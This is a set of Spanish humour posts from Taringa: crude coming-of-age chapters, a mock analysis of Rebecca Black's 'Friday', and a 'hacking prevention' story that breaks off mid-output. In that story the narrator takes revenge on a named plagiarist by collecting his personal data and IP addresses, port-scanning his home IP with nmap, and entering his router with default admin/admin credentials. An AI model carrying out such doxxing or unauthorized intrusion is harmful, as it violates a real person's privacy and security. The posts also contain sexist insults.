nanopene
Usuario (Ciudad del Vaticano)
dijo:Capítulos Anteriores: 1) Capítulo I: La Tengo Chiquita Capitulo II: Manuela, nuestra primera novia. Volviendo de la escuela me lo crucé a un tal Monatios que canchereaba de que había conseguido una novia con la que cogía todas las noches. Los amigos, amigotes y amigoides se sentaron alrededor del profeta y la mitad de los pelotudos asentían la cabeza como si entendieran de lo que estaba hablando. ─...y eztaba ahí y me la empezé a coger ─explicaba Monatios─ tenía la concha re apretada porque era la primera vez... ─Y sí, y claro, y obvio ─asentía el colectivo pseudo-Borg al unísono. ─A ver, ¿pero cómo te pusiste el forro? ─indagaba un amigote medio escéptico. ─Ah, ezo ez fázil, primero prezionás zobre la punta para zacarle el aire... ─ceceaba el (presunto) experimentado Monatios y prosiguió a recitar las instrucciones de las cajitas de los condones al pie de la letra. ─¡Qué grande! ─aprobaba la muchachada asintiendo con la cabeza. Luego de la rigurosa inquisición del jurado compuesto por vírgenes pornoadictos, hubo quórum y la presunta experiencia sexual de Monatios fue validada por la multitud; ascendiéndolo inmediatamente al estatus de semidios, ídolo de entre ídolos, ahí arriba sentado a la derecha del Diego. Pero, algo que la vida me enseñó es que existen dos reglas en la vida y esta es la posta de la posta: Regla 1: Si te tratan de ídolo, una mitad está realmente feliz por vos, y la otra mitad se mueren de la envidia. (Yo evidentemente caía en la mitad menos feliz) Regla 2: Mientras más quieras demostrar que la mojaste, más probabilidad de que seas más virgen que la Virgen María. No me lo creía. Mis detectores anti-chamuyos me indicaban que Monatios estaba verseando como el mejor. Aparte, dejate de joder, es un ceceador: tiene el derecho y la obligación de ser virgen, me lo imagino gritando "ZI, ZI, ZIII, mmme guZta aZí!", ¡las pendejas no podrían acabar porque se le cagarían de la risa en la cara! Aunque el pelotudo describía su experiencia con detalles super precisos, precisamente por esa razón yo me preguntaba: ¿se la cogió o se escribió una bitácora de navegación? No, no, no; mientras más lo pensaba, más me parecía que se había memorizado la Cosmopolitan y se pajeaba viendo Marimar. Ojo, vamos a aclarar una cosa, yo no condeno a los que se pajean viendo telenovelas. Seamos honestos, en Marimar Thalía estaba para darle y darle y darle hasta que los testículos hicieran implosión. Si no le habré dedicado torrentes, ríos y mares de amor candente hacia Araceli Gonzalez mientras miraba Nano (y... es lo que había, en VCC sólo tenía Cablín). Pero volviendo al tema, que se ponga a alardear de que la anda poniendo cuando todavía se chupa el dedo, eso sí era patético, y estaba dispuesto a desenmascararlo. Monatios se levantó y se despidió de su nuevo club de fans alegando que su novia lo estaba esperando en casa, les pidió que no lo llamaran para no molestarlo ya que estaría bastante ocupado en su cuarto y se despidió guiñando un ojo haciéndose el langa. Ese día decidí faltar al conservatorio y me dispuse a seguirlo hacia la casa para investigar si la historia tenía patas. Uhm... me puse a pensar sobre cómo infiltrarme a la casa del papanatas. Me puse a imaginar diferentes alternativas para aproximármele, luego de una profunda meditación y una planificación minuciosa mi mente volvía siempre al mismo escenario: "¡Eeh, capo!, ¿que hacés, todo bien? Invitame un Nesquik en tu casa, dale ceceador mentiroso hijo de re mil puta quién te va a creer que la mojaste. ¡Vení para acá, no te voy a recagar a palos, cagón!", pero algo me decía que no le caería muy simpático. Ninguna estrategia era lo suficientemente creativa y sutil como para que funcione. Cabizbajo decidí abandonar mi misión cerrando un capítulo, haciendo borrón y cuenta nueva... En ese preciso momento, me lo cruzo al hermanito menor que volvía alegremente cantando una canción de Nubeluz, todavía ungido por la inocencia: sería la presa perfecta para mi interrogación. ─¡Hola che!, vos sos el hermano de Monatios, ¿no? ─le tiré la pregunta sin asco. ─Thí, ¿voth quién thoth? ─me preguntó el mocoso insolente y ya me cayó mal. El ceceo debía ser hereditario en esta familia. Se me cruzó por la cabeza de que tenían lenguas bífidas, y esto me hizo divagar si en realidad era una familia de alienígenas al estilo de V Invasión Extraterrestre. Y si eran extraterrestres menos podían coger, es más, era mi deber patriótico impedir la copulación interracial. ─¡Soy un amigo de tu hermano, vengo de conocer a la novia! ─le expliqué observándolo atentamente por el rabillo del ojo... y las comisuras de mis labios comenzaron a crecer lentamente a la par de que las cejas del nene ascendían en señal de total sorpresa. ─¿Mi hermano tiene novia? ─me preguntó en total desconcierto. En mis adentros yo ya estaba gozando del momento: ¡SI, SI, SI, BUAJAJA, lo sabía carajo! ─¡Claro!, ¿JA, boludo no sabías? ─le dije haciéndome el inocente y apretándolo un poquito más─ está ahora en su cuarto con ella. Es más, ¡estuvo con ella toda la semana! ¡Uuh... tu hermano no confía en vos, no sabés nada! ─¡VOZ ZOZ EL BOLUDO!, Yo zé porque eztaba en zu cuarto zolo haciendo ruidos raros, cuando entré para ver qué pazaba me dijo que no era nada y que sólo eztaba ejerzitando la cadera!, ¿VEZ? ¡NO ZABEZ NADA! ─¡Momento!, moviendo... la Pelvis... ¿sobre la cama?... ¿solo? ─¡ZIII! ¿Qué Pelvis? DIJE CADERA BOLUDO, AAAH LERO LERO... NOoOo~ zabe nad... ─y lo interrumpí con una patada en el orto de lo feliz que estaba. Mi cara de felicidad: El hijo de puta se estaba cogiendo el colchón. ¡EL HIJO DE PUTA SE ESTABA COGIENDO EL COLCHON! ¡Esto era mucho más de lo que me podía esperar, de Miss Manuela a Miss Simmons! íEl muchacho tenía estilo! Siguiente capítulo: (pendiente) --- Nota I: Esta historia es una obra de ficción, cualquier parecido con la realidad es pura coincidencia. Nota II: Si se dan cuenta (ya se dieron cuenta varios): mi "firma" está totalmente integrada en la historia, estilo mensaje subliminal. Ese soy yo, no me jodan, no me roben la historia. Todos los derechos resevados. Nota III: Este capítulo fue un dolor de huevos escribirlo. Si tienen honor y no los parió un coyote, por favor no lo copien. Encima que es gratis, dale conchudo, aflojá el boton derecho y el Ctrl+C, ¿no te duele el dedo la reconcha de la lora? Nota IV: Referencias culturales en este capítulo que se les puede haber pasado por alto porque son muy jóvenes o de otros países: + Borgs de Viaje a las Estrellas: http://www.youtube.com/watch?v=WZEJ4OJTgg8 + Marimar (1994): Telenovela Mexicana: http://www.youtube.com/watch?v=tl5mfciNQRg + Nano (1994): Telenovela Argentina: http://www.youtube.com/watch?v=5GMXm_YrNZw + Araceli González(1967, jaja re forro): Actriz Argentina: http://www.pyroradio.com/images/uploaded/41yearold.jpg + VCC (1982-1998): Antigua empresa Argentina de televisión por cable, fusionada con Cablevisión en 1998. + Cablín (1988-2000): Canal de entretenimiento infantil argentino. Era pre-Morgado (canal exclusivo de VCC): http://www.youtube.com/watch?v=c7Qw2h9Pskw. Era de Morgado xD: http://www.youtube.com/watch?v=fWeH920Elig + Nubeluz (1990-1996): Programa de entretenimiento infantil peruano: http://www.youtube.com/watch?v=3nUI4wi5QFo + Simmons (por si alguno vive en un tupper): http://www.simmons.com.ar/home.php Nota V: Tengo varias ideas para el próximo, pero de ahora en más van a ser un poco más espaciadas las publicaciones. Calculo que será entrega mensual (Si viviera de esto, lo haría mucho más rápido jaja). Por cierto, no me esperaba semejante respuesta, ¡gracias por la buena onda!

A los moderadores les dijo:Gracias por rehabilitar el post. Sinceramente no entiendo a los denunciadores, ¿en qué se basan las denuncias? Que no tengan sentido del humor, no es mi culpa. Deberían autodenunciarse por amargos.nanopene dijo:Antes que nada una dedicatoria a mis fans más fieles: Creative Commons dijo:Este contenido es de creación original por el usuario nanopene de Taringa. Esta obra se encuentra bajo licencia Creative Commons (CC BY-NC-ND 3.0)nanopene dijo:Capítulos Anteriores: Cliqueen acá Nota: Los links de este posts los pongo subrayados. Capítulo III: La primera vez... con un bagayo p o r n a n o p e n e (T a r i n g a) Todavía cagándome de risa por Monatios me retiro caminando hacia mi casa. Pero unos minutos después cuando por fin me calmé, me di cuenta de que en realidad no había nada de que reirme. Yo seguía igual de solo, jamás la había puesto y me seguía pajeando viendo telenovelas, pero Monatios me daba esperanzas... y a decir verdad, también algo de curiosidad. El tema es que hoy día todo es mucho más fácil, agarrás la revista Gente o la Maxim (seguro la comprás para leer los artículos, ¿no? Andá a cagar) o alguna porquería de Tinelli y seguro algún culo ves, pero en esa época no te quedaba otra que ir al kiosco de revistas y que tenían las barras negras que censuraban todo lo bueno. "¡Noventa penetraciones a la vez! La salvaje Jenny Mc...[Prohibida su venta a menores de 18 años]", te censuraban lo mejor con un rectángulo negro. Y no son los rectangulitos-cubre-pezones de hoy en día: era un puto rectangulón que cubría casi toda la tapa de la revista, lo único que se veían si tenías suerte eran los pies de la mina y la cara de trola. La posta es que todos habíamos escuchado hablar de conchas (y de vaginas, si eras nerd) pero te preguntabas a veces cuál sería la fisonomía de semejante "entidad". ¿Queda abajo, queda arriba, queda al frente, queda al costado, es redondo, se mueve, tiene dientes, tiene tentáculos, qué carajo es una concha? Y si tuviste alguna vez la ocasión de echarle un vistazo rápido a alguna mujer adulta por accidente, lo único que podías ver era ese matorral espeso del bosque subtropical húmedo. Pero nada de la misteriosa anatomía, ¿Qué carajo había escondido ahí abajo? Tenía que ponerla, estaba decidido y lo haría antes que mis compañeros. Taciturno empecé a interrogar sobre el arte del amor. "Los que se pelean se aman", me explicaban los grandes; oigan ustedes adultos de mierda que están leyendo esto: la puta madre que los parió. Es la mentira más grande que escuché toda mi vida. Existía un juego popular llamado "Juego del Semáforo" en donde el rojo era beso apasionado, amarillo era un piquito y verde era un beso amistoso. A mi me salía accidente de tránsito. Que las re parió. Tarde o temprano nos refugiamos en los amigos de los amigos, y si estás realmente desesperado les terminás pidiendo a las mujeres que te rebotaron (el término políticamente correcto es: "amigas" ) que nos presenten a alguien. Una alma caritativa siempre nos da una mano tarde o temprano. Ring, ring, me suena el teléfono. ─Che Tomás, tengo alguien para presentarte, es justo para vos. ─me dice toda emocionada. ─Uuy, que bueno!, ¿cómo es ella? ─le pregunto. ─Re simpática ─me responde ella. ¡Chan! Simpática. Pero bueno, que se le va a hacer no me puedo quejar, se dice que a caballo regalado no se le ven los... la reputa que lo pario. Flor de perra, como si yo le hubiera tenido ganas porque era "simpática". ─¿Cómo que simpática? ─le pregunto exasperado. ─Siiiiiii, es re buena, confiá en mí. Sos mi amigo y sé que es ideal para vos. ¿Esta es pelotuda o se hace? Cómo puede ser que las mujeres tengan esta habilidad de apuñalarme tres veces en una sola frase. Faltaba que me dijeran pito corto. ─¡...pito corto! ─¡¿Queé?! ─respondí asustado e indignado. Ya era una falta de respeto carajo. ─...que acá hay un estrépito, corto. Venite al Burger que estoy yendo con ella, chau, besote. Cuelgo el teléfono y me preparo. Ahora comienza un complejo ritual masculino pre-cortejo, así que mujeres estén atentas. El macho homo sapiens sapiens usualmente se pega una ducha rápida, en la cual se pasa el 90% de su tiempo enjabonándose los huevos y el pene, el 9% su cabello y el 1% del tiempo que le queda se enjuaga el resto del cuerpo. Luego de la ducha, sacamos el desodorante Axe y nos lo ponemos con la ilusoria expectativa de que tenga el efecto que tiene en las publicidades, ignorando que en realidad las mujeres lo detestan (al menos que sea el Axe Marine o el Axe Chocolate). Luego comienza la última etapa del ritual pre-salida: nos paramos en frente del espejo y metemos panza, sacamos panza, movemos los musculitos del pecho (ta,ta,tatatata,ta,ta), nos miramos el cabello, lo paramos, lo bajamos, lo cortamos un poco, le ponemos gel, le sacamos gel, le ponemos gel de nuevo, hasta que terminamos volviendo al mismo peinado de siempre. Una vez completado el ritual salgo hacia la parada del colectivo y mientras espero que llegue me pongo a razonar que lógicamente si mi amiga está para chuparse los dedos, se deberá juntar con mujeres de similar "calidad". Lógico. Me hago ilusiones y me pregunto qué clase de mujer me presentará. Limpiándome la boca de la baba que se me chorrea, me subo el colectivo rumbo al Burger. Cuando llego la veo a Mariana, mi amiga 'de facto', parada con su pantalón ajustadito, la blusita y la cintura de avispa que me vuelve loco. El mundo se me oscurece y lo único que veo es su rostro angelical brillando en un halo cual santa. Mi soldadito se entusiasma y se levanta para saludarla, hago control mental y ordeno al soldado para que baje la guardia pero en total desacato me desafia las órdenes endureciendo su postura. ─Hola Mari, ¿cómo andás? ─la saludo disimulando la guerra interna. Ella se me acerca y me abraza. FFFFFFUUUUU... ¡Alerta roja!, mientras le doy un beso hago un esfuerzo sobrehumano contorsionándome para que mi soldado no tocara su trinchera. ─¡Muack!, vení que te la presento ─me dice con voz de amiga mientras me arrastra hacia la mesa. Y la veo ahí. La simpática. Parada. Esperándome. Sacudiendo la mano en el aire. Dándome la calurosa bienvenida, totalmente feliz de verme. Esta es la representación artística de ella: Mariana, la reputa que te parió. Mujeres, un consejo: jamás presenten una mujer que tenga más bigote que el hombre, duele en el autoestima que una mujer sea más hombre que uno. Esta fue la primera vez que me presentaban una mujer y la primera lección de vida: jamás le pidas a una mujer atractiva que te presente a alguien... porque jamás te van a presentar alguien más linda que ella. Jamás. Existe una especie de simbiosis entre la mujer linda y la bagayo, y ambas requieren de la otra para subsistir: La linda necesita de la fea como repelente de hombres pesados. La fea adquiere así un rol al estilo de sancho panza y también de sabueso, evaluando los candidatos ideales para la ama. La fea, por su parte, necesita de la linda para que le consiga hombres inocentes... como yo. ─Laura, te presento a mi mejor amigo Tomás ─me presentó Mariana. ─¡Hola Tommy! ─me saludó la engendro de Mordor. Mi pito desmoralizado se puso a temblar. ─Chicos, los dejo porque tengo clase de Judo, ¡chauu! ─se me despide Mariana y encima la impertinente me guiña un ojo. ─La puta madre y de acá cómo me escapo ─dialogaba conmigo mismo─ ¿Qué le digo, cómo me escapo? No sabía que los Balrog existían, pensaba que Gandalf lo había matado en el puente de Khazad-dûm... pará, pará, ¿qué carajo estás diciendo?, eso es ridículo, eso es una novela de ficción. ¡Ya sé!, pero mirala a ella por el amor de Dios... En medio de esta meditación, Laura se me sienta al lado interrumpiéndome el flujo de pensamientos. ─¿Hace mucho que la conocés a Mariana? ─preguntaba la pobre en un intento de romper el hielo. ─Sí, ¿y vos... hace mucho que lo conocés a Saurón? ─se me escapa y me muerdo los labios al darme cuenta muy tarde del error. Por una parte sentía lástima y me reprochaba por ser tan cruel. Por otra parte me alegraba del acto fallido, ya que por fin me podría ir... ─¡DE TODA LA VIDA! WOOOW, ¿¿VOS TAMBIÉN SOS FANÁTICO DEL SEÑOR DE LOS ANILLOS?? La reputa madre que me parió. (Continuará...) - - - Simón dijo, no dijo, sí dijo, no dijo, sí dijo:El primero que... 1) Me diga el número total de links "ocultos" que le puse al post de la "Entrega Especial: Aprendiendo Poesía con Rebecca Black" (Con la excepción de creative commons). 2) Y me diga cuál es el nombre del jugador que tiene la cara "bola de bowling". Se gana una sorpresa. ------------------------------------------------------------------------------------------------------------------------------- Las respuestas eran: 1) En el post anterior de "Rebecca Black" hay 39 Links Totales (exceptuando los links al CC) 2) La cara "bola de bowling" es efectivamente el jugador de basket Jonathan Tavernari (para entender de dónde viene lo de "cara de bowling", deben clickear sobre el link Nro. 39 que está en la carita del postdata) ------------------------------------------------------------------------------------------------------------------------------- Tenemos un ganador: @Stargazer004 Y la gran sorpresa, se ganó: El Anillo Único (Bañado en oro 24K) ¡FELICIDADES @Stargazer004 ! (Enviame tu dirección postal, que todavía no domino las artes de la teleportación) - - - Trivia: ¿Sabían que el lunfardo "Bagayo" (mujer muy fea en español rioplatense) originalmente significaba "una carga"? Viene del italiano "bagaglio" que significa equipaje. Sucede que cuando los inmigrantes italianos llegaron, terminaban llamando a las hijas feas "una carga" porque sabían que no las podían casar con nadie (y como mujeres, tampoco podían trabajar como hombres) por lo que se convertía en una "carga" para la familia. Referencias culturales: + El Señor de Los Anillos: (Gandalf, Saurón, Mordor, Balrog, Khazad-dûm) Recomiendo que lean el libro que la película es apenas el vislumbre del universo Tolkiano. El zarpado de Tolkien se creó lenguajes artificiales para sus razas. ¿Saben lo groso que es eso? Alrededor de 20 lenguajes, para cada raza. Y no sólo eso, se creó proto-lenguajes (lenguajes primitivos) y los fue "evolucionando" según el tiempo que pasa en sus historias. Es como que se creó una especie de "Latín", y luego fue creando la evolución de los lenguajes, período por período, hasta llegar al equivalente del español, francés, alemán, etc... ¿se entiende? ESO ES GROSURA TOTAL. Corrección: llendo -> yendo (Gracias yanqui92) hechar -> echar (Gracias rinaldinho) kiosko -> kiosco (Gracias expaxonium654) Latin -> Latín Al menos -> A menos (Gracias MorNuN3 x2)

CreativeCommons dijo: Este contenido es de creación original por el usuario nanopene de Taringa. Esta obra se encuentra bajo licencia Creative Commons (CC BY-NC-ND 3.0) Este post tiene muchos links "ocultos" (39 links en total ), por lo que les recomiendo seguir el texto con su mouse mientras leen Existe mucha agresión gratuita hacia Rebecca Black porque se subestima el talento real de la artista. Por eso vamos a hacerle hacerle justicia diseccionando los profundos mensajes que se camuflan tras un velo de aparente frivolidad en la infame canción "Friday". RebeccaBlack dijo:Seven a.m., waking up in the morning (Siete AM, despertándome a la mañana) Gotta be fresh, gotta go downstairs (Debo empilcharme, debo bajar la escalera) Gotta have my bowl, gotta have cereal (Debo tener mi tazón, debo comer cereal) Seein' everything, the time is goin' (Veo todo, el tiempo se va) Tickin' on and on, everybody's rushin' (El tictac sigue y sigue, todos se apresuran) Gotta get down to the bus stop (Debo bajar hacia la parada del autobús) Gotta catch my bus, I see my friends (My friends) (Debo tomar mi autobus, veo a mis amigos)Rebecca Black comienza su primer verso con una sana apología a la disciplina, inculcando valores y buenas costumbres hacia las generaciones jóvenes. Definitivamente inculca un modelo de rol positivo, recalcando explícitamente que la nutrición es importante a la mañana: coman cereales chicos que tienen que sacar el tigre que hay en vos. "Debo tomar mi autobus, veo a mis amigos". "Veo a mis amigos", que hermoso mensaje de reafirmación hacia los valores familiares y amistosos. Gettin’ down on Friday (Llegando al viernes) Everybody’s lookin’ forward to the weekend (Todo el mundo está deseando que llegue el fin de semana) Partyin’, partyin’, Yeah! (De Fiesta, de Fiesta, ¡Sí!) Partyin’, partyin’, Yeah! (De Fiesta, de Fiesta, ¡Sí!) Fun, fun, fun, fun (divertido, divertido, divertido, divertido) Lookin’ forward to the weekend (Esperando que llegue el fin de semana) "Llegando al Viernes" Fíjense cómo desde el primer verso demuestra un dominio excepcional de la etimología, la lingüística y el lenguaje. Viernes viene del latín venĕris dies, día de la diosa Venus. La diosa Venus era la representante de la lujuria, el amor, la diversión y hoy en día también se lo usa para denominar al conjunto de bendiciones de la diosa Venus. Por otra parte venĕris en latín también es la segunda persona singular del futuro perfecto del indicativo de veniō (llegar), lo cual venĕris significa "habrás llegado". Lo que forma un juego de palabras es-pec-ta-cu-lar: "Llegando habrás llegado". Es Impecable, es Magistral. Así que ojo, señores y señoras, este comienzo tan poderoso ya nos demuestra el talento innato de esta artista. Estamos lidiando con una genia literaria de un calibre insospechado: ¡Rebecca Black se encuentra a la altura de Borges, Dostoevsky, Shakespeare y Virginia Woolf! Continuemos explorando la obra de esta genia. Yesterday was Thursday, Thursday (Ayer fue jueves, jueves) Today i-is Friday, Friday, Partyin’ (Hoy e-es VIERNES, VIERNES, FIESTA) We-we-we so excited (NOSOTROS-NOSOTROS-NOSOTROS TAN EMOCIONADOS) We so excited (TAN EMOCIONADOS) We gonna have a ball today (Vamos a pasarla bomba hoy) "Ayer fue Jueves, jueves" muy importante el énfasis en el segundo jueves. Muy amablemente nos recuerda que si ayer fue jueves, hoy debería ser viernes. ¡Momento!, ¿pero si hoy es viernes, entonces mañana es...? Tomorrow is Saturday (Mañana es sábado) And Sunday comes after...wards (Y el domingo le si...gue) Aah, eso lo explica. Pero por favor, ya sé lo que están pensando... no piensen que esta letra fue escrita por Karina Jelinek. No, no, eso sería un sacrilegio, sería como comparar a un gato cualquiera con el maestro Karin. No debemos caer en la trampa de la frivolidad ignorando el subtexto metafísico que la autora intenta transmitirnos, la cual posee una riqueza poética equiparable a la de Bob Dylan. Repasemos. "Ayer fue jueves, jueves. Hoy es viernes, viernes, fiesta. (...) Mañana es Sábado, y el domingo le si...gue". En esta simple cita se plasma la inconmensurable propiedad del tiempo y su avance impertérrito ante el clamor de la volición humana. Esto, a su vez, refleja la nimiedad existencial del espíritu ante las fuerzas inexorables del cosmos, recordándonos lo efímera que es la vida. "¡Que llegue el viernes!", pareciera implorar la autora, mas sus ecos se desvanecen en el vacío de un jolgorio que aún no ha arribado. Con este análisis concluyo reinvindicando la supremacía literaria de Rebecca Black. Saludos, -nanopene PD1: El tercer capítulo, este fin de semana PD2: Para los profesores de literatura: ¿Se dan cuenta que el análisis literario es cualquiera? Sus clases son puro chamuyo. PD3: La parte de la etimología de la palabra Viernes es real, eso no es una "invención".
CreativeCommons dijo:Este contenido es de creación original por el usuario nanopene de Taringa. Esta obra se encuentra bajo licencia Creative Commons (CC BY-NC-ND 3.0) El resto de los derechos reservados. NanoCurso: Prevén el Hacking y evita el Ridículo p o r n a n o p e n e Introducción Antes que nada me gustaria aprovechar este espacio para agradecerle la generosidad del "experto en seguridad informática" Martin Gonzalo Lengua-Olivares de CholoHack.com por plagiar mi nota de EspiaFace, ya que sin él no podría haberme "inspirado". También quiero agradecerle por su tácita autorización como objetivo experimental y facilitarme ejemplos... de lo que NO se debe hacer . No voy a adentrar en detalles técnicos usados, ni voy a enseñar las técnicas específicas para "atacar", sino que me enfocaré más en los conocimientos conceptuales para que entiendan POR QUÉ es tan importante tomar ciertas medidas precautorias (por ejemplo: por qué cambiar contraseñas que vienen por defecto en los routers) y vean las IMPLICACIONES de no tomar esas medidas de seguridad básicas. Vamos a iniciar el nanocurso en forma narrativa ya que es el método más entretenido de aprender algo. Por el protocolo debo hacer el siguiente anuncio: La siguiente historia es una obra de ficción... basada en hechos reales. (guiño, guiño) Día T-1: Desembarco del Troll "Cu-cu", me suena el ICQ. Me pregunto quién me estará enviando un mensaje a las cuatro de las mañana. ─Hombre, han pirateado tu artículo de SpyCara, mira el link ─me decía el mensajito de un amigo en el lado opuesto del globo terráqueo. ─Mierda ─le dije─ la puta madre. Agarré el mouse y clickeé para ver el presunto artículo plagiado. El sitio se llamaba IncaHack.com, un sitio compuesto por dos personas que se autoproclamaban expertos en seguridad informática. "A la mierda", me dije y me fui al baño corriendo porque me estaba cagando encima. Me meto al baño con la netbook en la mano. "Cu-cu", me suena el ICQ de nuevo dentro. Es Naty, una mina a la que le tengo ganas desde hace dos décadas. "Holis, ¿En que andás?", me pregunta la calienta pijas. Estoy tentado en escribirle: "cagando, ¿y vos?". "Nada", le digo. Me pongo a pensar cuánta gente me habrá dicho "nada" cuando está cagando. Ella no me responde, cambio la ventana hacia el sitio IncaHack y lo veo ahí mi artículo alevosamente parafraseado. "Cu-cu", esta vez es el gallego de nuevo. ─¿Oye lo has visto? ─Si, lo ví. ¡Qué reverendo hijo de puta! ─le tipeo frustrado: taca, taca, tac. Nunca escuché un tipeo más triste en mi vida. ─Mira, este es el tío, xD ─me dice, y me envía un archivo con toda la información personal del tipo, incluyendo DNI, dirección, teléfono de la novia, seguro social, grupo sanguíneo... este gallego se va al carajo, ¿de qué mierda me sirve saber que es afiliado a ESSALUD? ─Gallego, aflojá con el Ritalín. Me pasaste de todo menos el nombre gil ─le recrimino y él recapacita enviándomelo. El plagiador se llama Josefo Clotildo Lengua-Salivares, pero en el sitio IncaHack sólo aparece "Clotildo Lengua". "Faa re loco, re largo el nombre", pienso. Debe ser parte de la aristocracia Peruana... o es eso o es un personaje de telenovela barata. ─Oye gillipollas ─me dice mi amigo gallego─ yo que tu no me quedo de brazos cruzados. Es un Lamer... te está plagiando un Lamer, ¿cómo dormirás tranquilo sabiendo que te plagió el Lamer Lengua (!!) JUAAAAAAAA EL-LAMER-LENGUAAAAA xDDDDDDDD Jajaja, gallego hijo de puta siempre metiendo cizaña, pero algo de razón tenía. La palabra "lamer" es una palabra lingüísticamente rica que condensa muchos conceptos al mismo tiempo, proviene de la palabra "lame" que en inglés significa inútil, pero en la jerga hacker engloba todo lo siguiente: patético, que sólo le interesa la vanagloria, que sabe sólo lo justo únicamente para alardear de que "sabe" ante sus amigos y ataca para joder, pero que en realidad no sabe nada real. Alguien que jamás tiene interés genuino por el conocimiento. Generalmente son niños malcriados que tienen complejo de inferioridad, y que les importa más "parecer" que "ser". Actualizo mi post plagiado de "Desnudando SpyCara" exponiendo el nombre completo del plagiador, en la popular página de Paringa! en donde suelo publicar notas cuando estoy en un pedo olímpico... Unos días más tarde recibo el siguiente mensaje privado de un tal Clotilzho en la página de Paringa!:tu 'actualización' con mi nombre en tu post me parece una falta de respeto aunque tienes derecho a equivocarte, te pediría que lo quites, si es que estás de acuerdo. La verdad es que se me pasó, no tenía el link al momento y lo puse nomás, como pongo mucha info sin poner fuente, pero ya está arreglado, claro está que la investigación lo hice en torno a tu post en este site y he vuelto a re-validarlo, he hecho todos los pasos y hasta me 'infecté' para comprobar si lo que dices es cierto. De repente siento un olor raro... ¿a qué huele esto? Ah, ¡BULLSHIT! Era eso, el olor nauseabundo de una mentira asquerosamente mal redactada. Ni en pedo podés reescribir un artículo completo "de casualidad" o "sin querer queriendo", el tipo encima escribe en primera persona como si lo hubiera investigado él. Él es el arquetipo del plagiador deshonesto y se merece un chas chas en la cola. Aún así pienso que debo ser justo y debo darle una oportunidad para redimirse, sólo y sólo si reconoce que es un plagiador y se disculpa públicamente... y le advierto: si no pide disculpas en 24 horas, le voy a hacer mierda. El Lamer.Lengua me manda al carajo en forma categórica con una falta de respeto incluso mayor: trata de ocultar la evidencia de su plagio modificando la fecha de la publicación de su post (26 de Abril) igualándolo con la fecha de publicación del mío (25 de Abril). Para agregar más sal a la herida me envía una respuesta final: Con respecto a las disculpas, no lo haré porque no me corresponde hacerlo. Ahora si bien quieres hacerme daño, no sé cómo lo harás, pero yo tengo buenas relaciones con alguna gente importante, a vecees ni siquiera me conocen y con algunos una buena amistad, pero un rumor en Internet no hará más que hacerme del 'pobrecito'. Yo te digo, cuidado con lo que dices porque se te puede ir el tiro por la culata. Puedes quedar como un verdadero IMBÉCIL, como me llamas en tu post. "Alea Jacta Est", se ha declarado la guerra. Día T: Desembarco en Trollandía Como en toda guerra lo primero es el trabajo de inteligencia: recolectar información sobre el enemigo. ¿A quién estoy atacando? Hago un seguimiento de actividades online del Lamer-Lengua hasta que establezco un patrón identificando por los horarios de su uso. IP de la casa (esta IP es usada de noche) -------------- IP address: 190.234.18.XXX IP country code: PE IP address country: Peru IP address state: Lima IP address city: Lima IP address latitude: -12.0500 IP address longitude: -77.0500 ISP of this IP: Telefonica del Peru Local time in Peru: 2011-04-27 10:46 Language: EN-US,EN;Q=0.8 Browser:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 IP del trabajo (Desde acá se conecta únicamente a la tarde) -------------- IP address: 190.12.73.YYY IP country code: PE IP address country: Peru IP address state: Lima IP address city: Lima IP address latitude: -12.0500 IP address longitude: -77.0500 ISP of this IP: OPTICAL IP Local time in Peru: 2011-04-27 10:44 Language: ES-ES,ES;Q=0.8 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 El que me interesa en particular es la IP de la casa. Usa Windows NT 6.1 lo que significa que está usando Windows 7, tiene un procesador de 32 bits (x86) porque no aparece WoW64 en ningún lado (Explicación: Chrome sólo tiene versiones de 32 bits para Windows, y si tuviera un CPU de 64 bits Chrome correría bajo un subsistema de Windows que compatibiliza aplicaciones 32 para 64 bits. Esa traducción de 32 a 64 bits se ve reflejado en el User Agent como WoW64), y también usa una versión desactualizada de Chrome (10.0.648.205) Ya conocemos el Sistema Operativo y por ser x86, sabemos que cualquier exploit normal va a funcionar bárbaro, si es que encontramos alguna vulnerabilidad sin parchear. La versión del Chrome no sólo me dice si el navegador es vulnerable sino que también puedo comenzar el bosquejo de su perfil psicológico: con la antigüedad de la versión puedo inferir sobre sus costumbres de actualización. Si uno mantiene su navegador "mas o menos actualizado", uno se puede esperar el resto del sistema operativo "mas o menos actualizado". El siguiente paso lógico para recopilar información es escanear los puertos de la computadora. Vamos a ver cómo responde.... $ nmap -sS -Pn -T4 190.234.18.XXX Starting Nmap 5.51 ( http://nmap.org) at 2011-04-27 09:09 Eastern Daylight Time Nmap scan report for 190.234.18.XXX Host is up (0.0083s latency). Not shown: 995 filtered ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 1900/tcp closed upnp 2869/tcp closed icslap Nmap done: 1 IPaddress (1 host up) scanned in 296.05 seconds In-cre-i-ble. Este "experto en seguridad" tiene puertos abiertos. Lamer-Lengua, ¿estar crazy? Bueno... quizás tiene un servidor bien configurado y tiene conexión directa a internet sin routers. ¿Probamos conectarnos? Probablemente no nos lleve a ningún lado, pero no perdemos nada con probar. TD-W8901G User: admin Password: admin TP-LINK 54M Wireless ADSL2+ Modem Router (d8:5d:4c:d8:8e:e9) Firmware Version: 3.0.0 Build 090805 Rel.42905 ADSL Firmware Version: FwVer:3.11.2.167_TC3086 HwVer:T14.F7_5.0 Downst. Upstream SNR Margin: 22.3 35.1 db Line Attenuation: 39.1 24.0 db Data Rate: 2016 253 kbps Max Rate: 14760 1101 kbps POWER: 18.8 11.3 dbm Encapsulation ISP: [ ] Dynamic IP Address [ ] Static IP Address [ ] PPPoA/PPPoE Bridge Mode Bridge Mode: 1483 Bridged IP LLC Me-estás-Jodiendo. EL ROUTER TIENE ACCESO EXTERNO Y ENCIMA TIENE LA CONTRASEÑA POR DEFECTO Y PARA COLMO ESTÁ ENCENDIDO LAS 24HS link: http://www.youtube.com/watch?v=3NMGsRmZTFQ Una vez recolectada la valiosa inteligencia sobre la vulnerable situación enemiga, se ha notificado al batallón de Infantes de Marina para dar inicio la penetración. Día T+1: Penetración en Trollandía Se han desplegado escuadrones de scouts para investigar terreno enemigo y nos han traido los siguientes reportes: hostname> casa IP addr> 192.168.1.2 MAC addr> 00:0E:A6:74:F3:A6 Expire t> 2days, 15:9:34 (Time unit: tick. 1 tick = 1/60 second) Ping 192.168.1.2 with 32 bytes of data Request timed out Request timed out Request 